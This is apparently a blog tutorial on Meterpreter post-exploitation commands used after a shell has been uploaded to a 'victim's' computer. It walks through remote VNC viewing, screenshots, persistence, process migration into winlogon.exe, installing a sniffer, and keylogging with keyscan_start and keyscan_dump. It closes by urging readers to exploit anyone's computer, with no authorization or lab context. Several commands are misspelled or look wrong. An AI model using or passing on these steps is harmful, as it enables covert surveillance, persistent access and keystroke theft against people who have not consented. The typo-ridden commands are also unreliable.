All what u have to do after uploading shell is just use several commands and then u can control any computer remotely ..
As u can see I uploaded a shell
After uploading shell , you can use so many different commands .
The very first command is “run vnc” , this command is used for installing vnc in the remote computer.
meterpreter> run vnc
Then if you want to see that what that user is doing then you can take the screenshot also by using
“screenshot”
meterpreter>screenshot
After using the command “screenshot” this kind of screenshot will appear..
If you don’t want that the victim should execute the .exe file which you have injected again and again then
you can make his machine persistence and after that there is no need to execute the file again and again , only once it is executed and after that it will work automatically.
We can use the following command for that..
metarpreter> run persistence -x
and this command will make it persistence.
After making the victim’s machine persistence we can check it weather it is working or not and for that , just type
meterpreter> reboot
this will make victim;s system reboot remotely.
Meterpreter initially runs inside the exploited process or as its
own executable’s process in some cases. If that process is stopped for
any reason, the Meterpreter session will close, so it is good practice
to migrate the session to more stable process such as Windows’
explorer.exe.
The following example shows the use of a handful of commands in
order to locate a process that the user will not close during his or her
session.
The commands are:
ps – Show a list of running processes.
getpid – Display the process Meterpreter is using, which shows an svchost.exe.
migrate pid – Move Meterpreter to a new process ID number, where we request the winlogon.exe process. getpid – Display the new process Meterpreter is using, which we verify is the winlogon.exe proces
meterpreter> psIt will give you the process list of all the processes running..
Here you can see the process list..
Now to migrate any process , just type a command “migrate with the process code” like If we wnat to migrate Internet explorer then just simply type the command
meterpreter> migtrate 332
One more command is for prefetching the command.
meterpreter> run prefetching -h
For searching more commands for exploitation , we can use this command..
meterpreter> use -l
This will give us the list of all main commands used for attacking
Form this list , we can use any command we want , just what we have to do is use this small command..
meterpreter> use sniffer
This commant will install a sniffer in the victim’s machine
One more command is “keyscan_start” and this is used for installing a keylogger in victim’s machine.
meterpreter>keyscan_start
Here you can see , I entered in victim’s computer and I can see what ever I want from here and to go back to your meterpreter just use the command written below..
C:\windows\system32>exit
and If you want to see all the keylogs then just use this command
meterpreter> keyscan_dump
this will show us all the keyss presses line by line.
This is how we can use alot of commands and use them to exploit anyone’s computer , just give it a try !!
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon